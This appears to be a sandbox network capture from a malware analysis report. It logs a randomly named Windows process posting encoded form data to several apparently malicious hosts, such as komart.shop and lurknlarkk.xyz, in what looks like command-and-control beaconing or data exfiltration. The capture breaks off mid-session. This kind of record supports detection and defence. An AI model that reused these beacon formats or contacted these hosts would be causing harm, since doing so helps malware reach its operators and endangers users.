Oct 8, 2024 15:39:57.730890989 CEST | 738 | OUT | POST /p9u3/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Host: www.komart.shop
Origin: http://www.komart.shop
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 223
Referer: http://www.komart.shop/p9u3/
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Data Raw: 6e 56 3d 4f 33 68 38 38 30 4a 61 6f 65 74 31 46 2b 42 4a 51 42 74 70 34 6e 56 76 42 44 49 72 7a 37 4f 38 38 4d 42 38 47 64 36 59 68 6b 4c 6f 41 52 69 4a 50 36 49 6a 33 36 52 6d 74 6c 33 57 54 36 71 41 51 42 77 75 57 58 6d 6c 6b 70 6c 31 55 79 38 6c 63 5a 74 4e 2b 4f 77 67 6c 42 6a 54 4f 52 6e 50 38 42 71 2b 51 6d 36 4c 42 35 53 73 45 6c 36 67 65 33 55 6f 72 36 33 58 51 76 53 54 51 57 74 59 30 35 72 58 52 49 68 72 41 2b 6f 78 35 48 35 70 4e 67 70 44 34 77 65 66 63 68 76 4f 6b 6a 2f 4e 39 7a 4e 4e 62 66 48 75 33 4c 4a 6d 55 36 6e 6f 36 62 2b 48 45 39 2f 48 57 54 4f 74 55 4d 4b 2b 4e 79 6b 77 58 46 75 58 66 59 59 5a 4a 61 6a 44 58 6e 6f 30 76 71 45 56 36 72 2f 63
Data Ascii: nV=O3h880Jaoet1F+BJQBtp4nVvBDIrz7O88MB8Gd6YhkLoARiJP6Ij36Rmtl3WT6qAQBwuWXmlkpl1Uy8lcZtN+OwglBjTORnP8Bq+Qm6LB5SsEl6ge3Uor63XQvSTQWtY05rXRIhrA+ox5H5pNgpD4wefchvOkj/N9zNNbfHu3LJmU6no6b+HE9/HWTOtUMK+NykwXFuXfYYZJajDXno0vqEV6r/c
Oct 8, 2024 15:39:58.520190954 CEST | 668 | IN | HTTP/1.1 404 Not Found
content-encoding: gzip
content-type: text/html
date: Tue, 08 Oct 2024 13:39:58 GMT
etag: W/"66fe0220-2b5"
server: nginx
vary: Accept-Encoding
content-length: 454
connection: close
Data Raw: 1f 8b 08 00 00 00 00 00 04 03 75 92 bd 6e 14 31 10 c7 fb 7b 0a e3 2a 91 b2 e7 43 29 63 6f 03 d4 49 71 0d d5 c9 f1 4e 6e 1d bc de c5 9e bb 70 42 3c cc 29 bb 4f 40 91 e3 43 91 20 a2 40 48 50 82 28 a0 42 3c 00 05 2d f6 7a 57 80 10 6e ec d9 f9 cf 6f be 96 df ba 7b 7c 67 7e ff e4 1e 29 b1 32 f9 84 c7 8b 18 69 97 82 9e 4b 1a 3f 80 2c f2 09 21 1c 35 1a c8 db a7 ed fb ee f3 f6 65 b7 6b 3f bc de 3d ff da 5e b5 5f da 17 ed 0f ce 92 3f 2a 2b 40 19 78 d8 64 f0 70 a5 d7 82 aa da 22 58 cc 70 d3 00 25 83 25 28 c2 23 64 31 e1 11 51 a5 74 1e 50 c0 4a 65 e7 0d 25 ac 4f d9 83 ac ac 40 d0 b5 86 8b a6 76 f8 47 f8 85 2e b0 14 05 ac b5 82 ac 37 0e 88 b6 1a b5 34 99 57 d2 80 b8 3d 9d 85 16 42 45 46 db 07 c4 81 11 d4 e3 c6 80 2f 01 02 a9 74 70 26 28 53 de 33 70 ae 76 d3 f0 8a 2d b3 d4 33 3f ad 8b 4d 30 0b bd 26 ca 48 ef 05 0d 1d 45 61 82 ea 6a 49 bc 53 81 10 5e 89 30 70 1a bb a4 44 1a 14 34 94 fb 57 e4 62 a1 2b b9 84 04 f8 17 bc 58 54 e0 fd 28 08 85 37 b1 fc 78 fe 37 f7 ed 25 3f 75 a3 e8 70 f6 f6 66 f7 ad 7d d7 5d 75 df bb [TRUNCATED]
Data Ascii: un1{*C)coIqNnpB<)O@C @HP(B<-zWno{|g~)2iK?,!5ek?=^_?*+@xdp"Xp%%(#d1QtPJe%O@vG.74W=BEF/tp&(S3pv-3?M0&HEajIS^0pD4Wb+XT(7x7%?upf}]uOo_l{84OR(g2BqB"n+WG}z@g*{bLdtLQ$$|k


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.5 | 50006 | 133.130.35.90 | 80 | 4568 | C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:40:00.275993109 CEST | 1755 | OUT | POST /p9u3/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Host: www.komart.shop
Origin: http://www.komart.shop
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 1239
Referer: http://www.komart.shop/p9u3/
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Data Raw: 6e 56 3d 4f 33 68 38 38 30 4a 61 6f 65 74 31 46 2b 42 4a 51 42 74 70 34 6e 56 76 42 44 49 72 7a 37 4f 38 38 4d 42 38 47 64 36 59 68 6b 44 6f 41 67 43 4a 4d 5a 51 6a 32 36 52 6d 79 56 33 58 54 36 72 43 51 46 63 71 57 58 71 31 6b 72 64 31 53 51 30 6c 49 34 74 4e 77 4f 77 67 39 42 6a 53 41 78 6d 53 38 46 4f 79 51 69 6d 4c 42 35 53 73 45 6d 69 67 65 6c 38 6f 70 36 33 55 5a 50 53 50 55 57 74 77 30 35 79 73 52 49 31 52 41 50 49 78 35 6e 70 70 50 56 31 44 6c 41 65 52 64 68 76 57 6b 6a 69 54 39 7a 52 72 62 66 69 37 33 4a 4a 6d 58 4d 47 4e 76 4b 36 48 53 73 4c 32 5a 45 43 6f 45 4a 2b 70 44 77 56 43 62 6b 61 36 54 4b 41 73 44 76 50 75 58 6a 31 34 38 2f 6b 2f 35 75 75 63 62 55 65 72 64 39 6b 6b 57 4b 39 46 73 50 50 56 55 4f 62 71 51 4c 46 79 4f 45 2f 58 2b 49 37 78 55 4c 2b 4e 6e 48 77 69 36 76 67 76 35 73 58 2b 38 68 71 49 4e 69 36 30 6e 42 71 65 34 5a 77 66 53 51 6a 33 36 4e 49 42 74 73 69 62 65 4c 54 70 58 35 6a 68 4d 57 6a 6f 51 77 52 78 65 75 73 6d 31 50 44 34 68 5a 30 53 65 32 75 55 63 78 6b 72 73 45 6c [TRUNCATED]
Data Ascii: nV=[TRUNCATED]
Oct 8, 2024 15:40:01.304867029 CEST | 668 | IN | HTTP/1.1 404 Not Found
content-encoding: gzip
content-type: text/html
date: Tue, 08 Oct 2024 13:40:00 GMT
etag: W/"66fe0220-2b5"
server: nginx
vary: Accept-Encoding
content-length: 454
connection: close
Data Raw: 1f 8b 08 00 00 00 00 00 04 03 75 92 bd 6e 14 31 10 c7 fb 7b 0a e3 2a 91 b2 e7 43 29 63 6f 03 d4 49 71 0d d5 c9 f1 4e 6e 1d bc de c5 9e bb 70 42 3c cc 29 bb 4f 40 91 e3 43 91 20 a2 40 48 50 82 28 a0 42 3c 00 05 2d f6 7a 57 80 10 6e ec d9 f9 cf 6f be 96 df ba 7b 7c 67 7e ff e4 1e 29 b1 32 f9 84 c7 8b 18 69 97 82 9e 4b 1a 3f 80 2c f2 09 21 1c 35 1a c8 db a7 ed fb ee f3 f6 65 b7 6b 3f bc de 3d ff da 5e b5 5f da 17 ed 0f ce 92 3f 2a 2b 40 19 78 d8 64 f0 70 a5 d7 82 aa da 22 58 cc 70 d3 00 25 83 25 28 c2 23 64 31 e1 11 51 a5 74 1e 50 c0 4a 65 e7 0d 25 ac 4f d9 83 ac ac 40 d0 b5 86 8b a6 76 f8 47 f8 85 2e b0 14 05 ac b5 82 ac 37 0e 88 b6 1a b5 34 99 57 d2 80 b8 3d 9d 85 16 42 45 46 db 07 c4 81 11 d4 e3 c6 80 2f 01 02 a9 74 70 26 28 53 de 33 70 ae 76 d3 f0 8a 2d b3 d4 33 3f ad 8b 4d 30 0b bd 26 ca 48 ef 05 0d 1d 45 61 82 ea 6a 49 bc 53 81 10 5e 89 30 70 1a bb a4 44 1a 14 34 94 fb 57 e4 62 a1 2b b9 84 04 f8 17 bc 58 54 e0 fd 28 08 85 37 b1 fc 78 fe 37 f7 ed 25 3f 75 a3 e8 70 f6 f6 66 f7 ad 7d d7 5d 75 df bb [TRUNCATED]
Data Ascii: un1{*C)coIqNnpB<)O@C @HP(B<-zWno{|g~)2iK?,!5ek?=^_?*+@xdp"Xp%%(#d1QtPJe%O@vG.74W=BEF/tp&(S3pv-3?M0&HEajIS^0pD4Wb+XT(7x7%?upf}]uOo_l{84OR(g2BqB"n+WG}z@g*{bLdtLQ$$|k


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.5 | 50007 | 133.130.35.90 | 80 | 4568 | C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:40:02.827182055 CEST | 469 | OUT | GET /p9u3/?nV=D1Jc/C1nh+BZL85aQihK2StkCXQN9YWXqdphFMmfowbAWgC+evwb7cYTziaUWePLaVULTAuSiJlrRgQRJK1EyuYNuFTcIXqGngDeSQ6xB8eOEHekfFMT1fbVeuWDNHI3uA==&ntHx=DVDDWR70P4Ux HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Host: www.komart.shop
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Oct 8, 2024 15:40:03.615032911 CEST | 883 | IN | HTTP/1.1 404 Not Found
content-type: text/html
date: Tue, 08 Oct 2024 13:40:03 GMT
etag: W/"66fe0220-2b5"
server: nginx
vary: Accept-Encoding
content-length: 693
connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e a4 b3 a4 ce a5 da a1 bc a5 b8 a4 cf c2 b8 ba df a4 b7 a4 de a4 bb a4 f3 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 65 75 63 2d 6a 70 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 65 72 72 6f 72 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 2d 65 72 72 6f 72 22 3e 0a 20 20 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 67 2f 65 72 72 6f 72 2f 65 72 [TRUNCATED]
Data Ascii: <!DOCTYPE html><html lang="ja"><head> <title></title> <meta http-equiv="content-type" content="text/html; charset=euc-jp" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="stylesheet" href="/css/error.css"></head><body><div class="p-error"> <img src="/img/error/error.png" alt="" class="p-error__image"> <div class="p-error__message"> <p> <br> 30 </p> <p> <a href="/">TOP</a> </p> </div></div><script> setTimeout("redirect()", 30000); function redirect(){ location.href="/"; }</script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.5 | 50008 | 3.33.130.190 | 80 | 4568 | C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:40:08.807380915 CEST | 748 | OUT | POST /u6k6/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Host: www.healthyloveforall.net
Origin: http://www.healthyloveforall.net
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 203
Referer: http://www.healthyloveforall.net/u6k6/
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Data Raw: 6e 56 3d 51 61 52 72 63 32 31 4c 36 2f 41 4d 63 70 41 36 63 50 56 4a 45 6c 65 50 69 6f 6a 76 35 2f 48 65 52 34 52 6b 37 66 36 34 68 43 56 51 4f 49 76 76 35 57 71 4e 6b 32 4a 2b 57 51 51 52 2f 42 79 2b 6b 36 61 2f 33 35 34 52 44 67 58 45 32 52 6f 31 30 50 4c 35 59 41 64 33 36 34 67 58 50 72 53 2f 51 71 2f 44 35 30 30 54 57 2b 4e 31 51 79 76 36 37 70 44 73 48 2b 6e 6b 7a 77 38 5a 34 58 54 68 69 31 54 36 33 72 39 36 55 4e 4b 52 70 70 46 69 49 45 67 6e 61 62 2b 71 4a 75 38 4d 68 41 50 46 71 75 54 4d 42 59 63 48 33 6c 79 38 51 75 41 36 79 36 56 42 64 46 65 6f 74 2b 62 4b 32 32 77 44 39 31 4c 55 72 56 73 3d
Data Ascii: nV=QaRrc21L6/AMcpA6cPVJElePiojv5/HeR4Rk7f64hCVQOIvv5WqNk2J+WQQR/By+k6a/354RDgXE2Ro10PL5YAd364gXPrS/Qq/D500TW+N1Qyv67pDsH+nkzw8Z4XThi1T63r96UNKRppFiIEgnab+qJu8MhAPFquTMBYcH3ly8QuA6y6VBdFeot+bK22wD91LUrVs=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.5 | 50009 | 3.33.130.190 | 80 | 4568 | C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:40:12.751411915 CEST | 768 | OUT | POST /u6k6/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Host: www.healthyloveforall.net
Origin: http://www.healthyloveforall.net
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 223
Referer: http://www.healthyloveforall.net/u6k6/
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Data Raw: 6e 56 3d 51 61 52 72 63 32 31 4c 36 2f 41 4d 65 4a 77 36 61 65 56 4a 46 46 65 4f 6e 6f 6a 76 77 66 48 53 52 34 56 6b 37 61 44 39 69 77 68 51 4f 71 48 76 34 53 2b 4e 6c 32 4a 2b 4f 41 51 55 78 68 79 35 6b 36 57 47 33 34 6f 52 44 67 44 45 32 55 55 31 30 38 6a 36 65 51 64 31 31 59 67 56 53 62 53 2f 51 71 2f 44 35 30 77 35 57 2b 56 31 54 43 66 36 38 39 58 74 59 4f 6e 6e 30 77 38 5a 7a 33 54 6c 69 31 54 63 33 71 67 56 55 49 4f 52 70 74 42 69 49 51 38 6b 54 62 2b 73 46 2b 39 5a 67 44 72 4b 72 6f 6e 37 44 4c 67 47 30 32 61 43 52 59 74 51 6f 59 64 70 4f 6c 79 51 39 74 54 39 6e 47 52 71 6e 57 62 6b 31 43 35 57 70 61 5a 4a 74 7a 79 45 32 50 50 45 47 59 49 67 66 69 49 7a
Data Ascii: nV=QaRrc21L6/AMeJw6aeVJFFeOnojvwfHSR4Vk7aD9iwhQOqHv4S+Nl2J+OAQUxhy5k6WG34oRDgDE2UU108j6eQd11YgVSbS/Qq/D50w5W+V1TCf689XtYOnn0w8Zz3Tli1Tc3qgVUIORptBiIQ8kTb+sF+9ZgDrKron7DLgG02aCRYtQoYdpOlyQ9tT9nGRqnWbk1C5WpaZJtzyE2PPEGYIgfiIz


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.5 | 50010 | 3.33.130.190 | 80 | 4568 | C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:40:15.297725916 CEST | 1785 | OUT | POST /u6k6/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Host: www.healthyloveforall.net
Origin: http://www.healthyloveforall.net
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 1239
Referer: http://www.healthyloveforall.net/u6k6/
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Data Raw: 6e 56 3d 51 61 52 72 63 32 31 4c 36 2f 41 4d 65 4a 77 36 61 65 56 4a 46 46 65 4f 6e 6f 6a 76 77 66 48 53 52 34 56 6b 37 61 44 39 69 77 5a 51 50 62 6e 76 34 7a 2b 4e 6a 47 4a 2b 48 67 51 56 78 68 79 6b 6b 36 66 4f 33 34 6b 72 44 6c 48 45 32 78 59 31 79 4e 6a 36 58 51 64 31 74 6f 67 55 50 72 53 51 51 71 50 50 35 30 41 35 57 2b 56 31 54 41 48 36 76 4a 44 74 44 4f 6e 6b 7a 77 38 64 34 58 54 42 69 30 32 6e 33 71 6c 71 55 38 36 52 70 4a 6c 69 48 46 67 6b 63 62 2b 75 45 4f 38 61 67 44 57 4b 72 6f 54 4e 44 4b 46 68 30 31 4b 43 52 38 73 54 72 36 56 45 64 7a 71 78 2b 66 54 73 7a 67 56 74 76 58 37 33 6f 77 46 37 6a 34 52 63 71 55 32 46 34 37 32 65 52 35 77 55 4f 79 73 79 2b 50 5a 45 63 6b 6e 55 5a 4d 4f 37 69 39 4c 46 32 65 74 41 69 78 46 39 61 36 68 4e 74 35 38 65 4e 36 30 76 47 42 50 72 2b 31 4d 41 74 71 39 62 61 6d 67 2f 71 74 67 73 6f 2b 36 35 72 61 6f 54 52 46 79 6f 57 38 34 32 6d 42 42 34 6a 35 68 65 4c 6f 47 52 43 6f 51 53 31 6f 47 7a 33 79 41 54 48 55 74 73 65 49 31 6b 6a 4e 57 79 68 37 62 46 70 53 77 [TRUNCATED]
Data Ascii: nV=[TRUNCATED]


                                                                                                                   Session ID: 36 | Source IP: 192.168.2.5 | Source Port: 50011 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 4568 | Process: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                   Timestamp: Oct 8, 2024 15:40:17.834502935 CEST | Bytes transferred: 479 | Direction: OUT | Data:
                                                                                                                   GET /u6k6/?nV=dY5LfBxT8+4OTYgXKtZbNifUsoDX+uWzLeRRn9zdsxFld7n68myH2Gd2W2FS03HPt+W/9NATFibZyiY45uryUTVD4Y8PctWQGLDO40gge8F8TAbPjM2Na57q5AxIn0qb9A==&ntHx=DVDDWR70P4Ux HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Host: www.healthyloveforall.net
                                                                                                                  Connection: close
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                   Timestamp: Oct 8, 2024 15:40:18.282660961 CEST | Bytes transferred: 408 | Direction: IN | Data:
                                                                                                                   HTTP/1.1 200 OK
                                                                                                                  Server: openresty
                                                                                                                  Date: Tue, 08 Oct 2024 13:40:18 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 268
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6e 56 3d 64 59 35 4c 66 42 78 54 38 2b 34 4f 54 59 67 58 4b 74 5a 62 4e 69 66 55 73 6f 44 58 2b 75 57 7a 4c 65 52 52 6e 39 7a 64 73 78 46 6c 64 37 6e 36 38 6d 79 48 32 47 64 32 57 32 46 53 30 33 48 50 74 2b 57 2f 39 4e 41 54 46 69 62 5a 79 69 59 34 35 75 72 79 55 54 56 44 34 59 38 50 63 74 57 51 47 4c 44 4f 34 30 67 67 65 38 46 38 54 41 62 50 6a 4d 32 4e 61 35 37 71 35 41 78 49 6e 30 71 62 39 41 3d 3d 26 6e 74 48 78 3d 44 56 44 44 57 52 37 30 50 34 55 78 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?nV=dY5LfBxT8+4OTYgXKtZbNifUsoDX+uWzLeRRn9zdsxFld7n68myH2Gd2W2FS03HPt+W/9NATFibZyiY45uryUTVD4Y8PctWQGLDO40gge8F8TAbPjM2Na57q5AxIn0qb9A==&ntHx=DVDDWR70P4Ux"}</script></head></html>


                                                                                                                   Session ID: 37 | Source IP: 192.168.2.5 | Source Port: 50012 | Destination IP: 172.191.244.62 | Destination Port: 80 | PID: 4568 | Process: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                   Timestamp: Oct 8, 2024 15:40:24.286417007 CEST | Bytes transferred: 727 | Direction: OUT | Data:
                                                                                                                   POST /jqkr/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Host: www.lurknlarkk.xyz
                                                                                                                  Origin: http://www.lurknlarkk.xyz
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=0
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 203
                                                                                                                  Referer: http://www.lurknlarkk.xyz/jqkr/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Raw: 6e 56 3d 75 2f 56 53 47 2f 74 7a 70 32 43 34 4b 51 6f 4b 64 2f 79 78 73 62 6c 5a 79 55 61 30 56 55 49 49 79 4d 6a 53 42 72 75 77 55 76 68 67 61 4a 57 39 61 62 69 42 7a 75 39 45 33 45 56 57 35 6f 42 6e 73 30 52 2f 43 71 6d 77 64 49 5a 58 2f 35 4f 36 4a 42 7a 48 35 2f 73 45 39 30 77 4a 73 47 65 46 6f 38 57 34 4b 63 6c 66 79 75 46 32 2b 46 47 70 5a 59 37 6d 66 59 42 6e 64 74 34 2b 52 49 48 78 6b 50 78 50 48 75 48 32 68 5a 35 53 59 6b 53 37 45 63 53 4b 47 4c 68 43 76 75 72 34 53 77 4a 33 69 65 57 37 70 30 62 77 78 64 42 54 73 41 54 6f 4c 54 57 6b 67 74 54 44 52 67 43 6e 74 58 51 48 69 2f 52 46 65 35 38 3d
                                                                                                                  Data Ascii: nV=u/VSG/tzp2C4KQoKd/yxsblZyUa0VUIIyMjSBruwUvhgaJW9abiBzu9E3EVW5oBns0R/CqmwdIZX/5O6JBzH5/sE90wJsGeFo8W4KclfyuF2+FGpZY7mfYBndt4+RIHxkPxPHuH2hZ5SYkS7EcSKGLhCvur4SwJ3ieW7p0bwxdBTsAToLTWkgtTDRgCntXQHi/RFe58=
                                                                                                                   Timestamp: Oct 8, 2024 15:40:24.763355970 CEST | Bytes transferred: 195 | Direction: IN | Data:
                                                                                                                   HTTP/1.1 404 Not Found
                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  Date: Tue, 08 Oct 2024 13:40:24 GMT
                                                                                                                  Content-Length: 19
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                                                  Data Ascii: 404 page not found


                                                                                                                   Session ID: 38 | Source IP: 192.168.2.5 | Source Port: 50013 | Destination IP: 172.191.244.62 | Destination Port: 80 | PID: 4568 | Process: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                   Timestamp: Oct 8, 2024 15:40:26.823380947 CEST | Bytes transferred: 747 | Direction: OUT | Data:
                                                                                                                   POST /jqkr/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Host: www.lurknlarkk.xyz
                                                                                                                  Origin: http://www.lurknlarkk.xyz
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=0
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 223
                                                                                                                  Referer: http://www.lurknlarkk.xyz/jqkr/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Raw: 6e 56 3d 75 2f 56 53 47 2f 74 7a 70 32 43 34 4d 78 34 4b 62 63 61 78 6b 62 6c 57 75 6b 61 30 62 30 49 45 79 4d 76 53 42 75 4f 67 55 64 31 67 61 6f 6d 39 62 61 69 42 77 75 39 45 2f 6b 56 54 30 49 42 73 73 30 4e 33 43 6f 79 77 64 49 39 58 2f 38 71 36 4b 79 62 47 2f 76 73 47 32 55 77 4c 68 6d 65 46 6f 38 57 34 4b 63 67 45 79 75 74 32 2b 30 57 70 5a 39 58 6e 56 34 42 6d 55 4e 34 2b 56 49 48 31 6b 50 78 78 48 71 66 4d 68 66 31 53 59 68 75 37 45 49 47 4e 50 4c 68 49 72 75 71 50 63 54 74 7a 6b 75 71 72 68 6c 32 69 6b 2b 64 61 70 32 2b 43 52 78 65 4d 7a 4e 2f 37 42 7a 4b 51 38 6e 78 75 34 63 42 31 41 75 71 67 53 78 70 68 74 58 56 72 47 77 69 48 32 6e 48 2b 6d 68 52 73
                                                                                                                  Data Ascii: nV=u/VSG/tzp2C4Mx4KbcaxkblWuka0b0IEyMvSBuOgUd1gaom9baiBwu9E/kVT0IBss0N3CoywdI9X/8q6KybG/vsG2UwLhmeFo8W4KcgEyut2+0WpZ9XnV4BmUN4+VIH1kPxxHqfMhf1SYhu7EIGNPLhIruqPcTtzkuqrhl2ik+dap2+CRxeMzN/7BzKQ8nxu4cB1AuqgSxphtXVrGwiH2nH+mhRs
                                                                                                                   Timestamp: Oct 8, 2024 15:40:27.311445951 CEST | Bytes transferred: 195 | Direction: IN | Data:
                                                                                                                   HTTP/1.1 404 Not Found
                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  Date: Tue, 08 Oct 2024 13:40:27 GMT
                                                                                                                  Content-Length: 19
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                                                  Data Ascii: 404 page not found


                                                                                                                   Session ID: 39 | Source IP: 192.168.2.5 | Source Port: 50014 | Destination IP: 172.191.244.62 | Destination Port: 80 | PID: 4568 | Process: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                   Timestamp: Oct 8, 2024 15:40:29.380522013 CEST | Bytes transferred: 1764 | Direction: OUT | Data:
